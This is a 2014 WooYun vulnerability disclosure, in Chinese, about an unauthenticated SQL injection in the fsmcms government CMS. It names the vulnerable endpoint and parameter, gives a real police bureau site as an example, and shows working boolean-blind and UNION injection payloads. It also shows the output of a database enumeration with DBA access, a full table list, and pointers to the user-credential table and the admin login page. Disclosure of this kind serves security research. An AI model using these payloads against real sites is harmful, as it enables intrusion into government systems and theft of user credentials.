当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-061675

漏洞标题:某政府通用型cms前台注入一枚(一些公安信访网站中招)

相关厂商:fsmcms

漏洞作者: Haswell

提交时间:2014-05-22 23:15

修复时间:2014-08-20 23:16

公开时间:2014-08-20 23:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-22: 细节已通知厂商并且等待厂商处理中
2014-05-27: 厂商已经确认,细节仅向厂商公开
2014-05-30: 细节向第三方安全合作伙伴开放
2014-07-21: 细节向核心白帽子及相关领域专家公开
2014-07-31: 细节向普通白帽子公开
2014-08-10: 细节向实习白帽子公开
2014-08-20: 细节向公众公开

简要描述:


前台一枚注入,无需登录,大多为dba。

详细说明:

fsmcms,inurl:fsmcms 一下找到约 36,800 条结果
注入处:

/fsmcms/sites/main/select.jsp?select_value=


盲注与union查询注入
例如包头市公安局:btgaj.gov.cn/fsmcms/sites/main/select.jsp?select_value=FJ_QS

---
Place: GET
Parameter: select_value
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: select_value=FJ_QS' AND 2255=2255 AND 'Llbb'='Llbb
Type: UNION query
Title: Generic UNION query (NULL) - 29 columns
Payload: select_value=FJ_QS' UNION ALL SELECT CHR(113)||CHR(105)||CHR(114)||CHR(115)||CHR(113)||CHR(97)||CHR(65)||CHR(119)||CHR(113)||CHR(119)||CHR(77)||CHR(117)||CHR(111)||CHR(79)||CHR(82)||CHR(113)||CHR(117)||CHR(120)||CHR(114)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
web application technology: JSP
back-end DBMS: Oracle
current user is DBA: True


列库:

[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] FSM_CMS
[*] HITEKEP
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


FSM_CMS中P_USER表中有用户信息,然后fsmcms/adminindex.jsp管理员登陆
因为是通用型没有尝试后台拿shell

漏洞证明:

Database: FSM_CMS
[173 tables]
+--------------------------------+
| CAMS_ITEM |
| CAMS_NEWS_HISTORY |
| KEBIAO |
| P_ACCESSLOG |
| P_ACCESSLOG_201211 |
| P_ACCESSLOG_201301 |
| P_ACCESSLOG_201302 |
| P_ACCESSLOG_201303 |
| P_ACCESSLOG_201304 |
| P_ACCESSLOG_201305 |
| P_ACCESSLOG_201306 |
| P_ACCESSLOG_201307 |
| P_ACCESSLOG_201308 |
| P_ACCESSLOG_201309 |
| P_ACCESSLOG_201310 |
| P_ACCESSLOG_201311 |
| P_ACCESSLOG_201312 |
| P_ACCESSLOG_201401 |
| P_ACCESSLOG_201402 |
| P_ACCESSLOG_201403 |
| P_ACCESSLOG_201404 |
| P_ACCESSLOG_201405 |
| P_ACCESS_DAY |
| P_ADCOLUMN |
| P_ADINFOCONTENT |
| P_ADPIC |
| P_ADTEMPLATE |
| P_ADWEB |
| P_ADWEBPUBLISH |
| P_AGENT |
| P_AGENTDEFAULTWEB |
| P_AGENTROLE |
| P_AGENTWEB |
| P_BACKUP |
| P_CALENDAR |
| P_CHILDWEB |
| P_COLLECTMAGAZINE |
| P_COLNAVIGATION |
| P_COLUMN |
| P_COLUMNPERMISSIONS |
| P_COLUMNTEMPLATE |
| P_COLUMNTOINFO |
| P_COLUMNVISIBLE |
| P_COLUMNWELCOMEINFO |
| P_CONTRIBUTE |
| P_CONTRIBUTE_COLUMN |
| P_CRITIC |
| P_CUSTOMFIELD |
| P_CUSTOMFIELD_VALUE |
| P_DEALDEPART |
| P_DEPT |
| P_DEPTDUTY |
| P_DEPTGROUP |
| P_DEPTGROUPLINK |
| P_DEPTNODEAGENT |
| P_DIR |
| P_DOC |
| P_DOWNLOAD |
| P_DUTY_ARRANGE |
| P_EMAIL |
| P_FILE |
| P_FILESIGN |
| P_FILESIGNRESULT |
| P_FLOW |
| P_GNUM |
| P_GROUP |
| P_HOTSPOT |
| P_INDEXTEMPLET |
| P_INFO |
| P_INFOBROWSE |
| P_INFOBROWSEDAY |
| P_INFOCOMMENT |
| P_INFOSEND |
| P_INFOSHARE |
| P_INFOSHAREAUTO |
| P_INFOSOURCE |
| P_INFOTAG |
| P_INFOTOINFO |
| P_INTEGRALDETAIL |
| P_INTERVIEW |
| P_INTERVIEW_PIC |
| P_INTERVIEW_QUESTION |
| P_IP |
| P_ISSUEMAGAZINE |
| P_JOB |
| P_KEYS |
| P_LEADERMAIL |
| P_LEADERMAIL1 |
| P_LINK |
| P_LOB_FILE |
| P_LOB_TEXT |
| P_LOGCATEGORY |
| P_LOGINFO |
| P_LOGINNUM |
| P_MAGASERIALCOL |
| P_MAGAZINE |
| P_MAGAZINECOLUMN |
| P_MAGAZINEINFO |
| P_MAIL |
| P_MAIL_ATTACH |
| P_MENU |
| P_MESSAGEBOARD |
| P_MESSAGE_TYPE |
| P_NAVIGATION |
| P_NODE |
| P_NODEAGENT |
| P_OPERATECODE |
| P_OTHERWEB |
| P_PERSONWEB |
| P_POR_MODULECONFIG |
| P_POR_MODULELAYOUT |
| P_POR_MODULES |
| P_POR_PERMISSION |
| P_POR_USER |
| P_PRIVATEADDRESS |
| P_PROGRAMTEMPLET |
| P_PUBLICADDRESS |
| P_PUBLISH_QUEUE |
| P_PV |
| P_QNERESULT |
| P_QUESTIONFIELD |
| P_QUESTIONS |
| P_QUESTIONTABLE |
| P_QUESTION_REPLY |
| P_RECIPIENT |
| P_REGMEMBER |
| P_RELEASEROLE |
| P_REMINDER |
| P_REMOTEHOST |
| P_REPLY |
| P_RESEARCH |
| P_RESOPTION |
| P_RESRESULT |
| P_RESUME |
| P_REVERTMB |
| P_ROLE |
| P_ROLEMENU |
| P_ROLEWEB |
| P_SHAREHOST |
| P_SITEACCESSLOG |
| P_SITETEMPLATE |
| P_STATIC_QUEUE |
| P_TABLE |
| P_TABLEFIELD |
| P_TABLEPROGRAM |
| P_TABOO |
| P_TEMP |
| P_TEMPDESIGN |
| P_TEMPINCLUDE |
| P_TEMPLET |
| P_TEMPWEB |
| P_TODO |
| P_TOPIC |
| P_TOPICQUESTIONS |
| P_USER |
| P_USERDEPT |
| P_USERGROUP |
| P_USERINTEGRAL |
| P_VIDEO |
| P_WEB |
| P_WEBCOPYRIGHT |
| P_WEBTITLE |
| P_WEIBO |
| P_WFCONFIG |
| P_WFHISTORY |
| P_WFINSTANCE |
| P_WORKFLOW |
| P_WORKFLOWDETAIL |
| P_WORKLOG |
| P_WORKPLAN |
| P_WORKREVIEW |
| STUDENT |
| SYS_SECURITY_TOKEN |
+--------------------------------+


修复方案:

修补一下

版权声明:转载请注明来源 Haswell@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-05-27 13:53

厂商回复:

CNVD确认并复现所述情况。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-22 23:41 | 橘子 ( 路人 | Rank:0 漏洞数:3 | 呢个...羞射高中生一枚。带上大神@Haswell...)

    前排留爪~

  2. 2014-06-26 15:14 | 汪哥 ( 路人 | Rank:28 漏洞数:6 )

    火前留名

  3. 2014-10-25 23:43 | Coffee ( 普通白帽子 | Rank:144 漏洞数:15 | Corie, a student of RDFZ.)

    “因为是通用型没有尝试后台拿shell”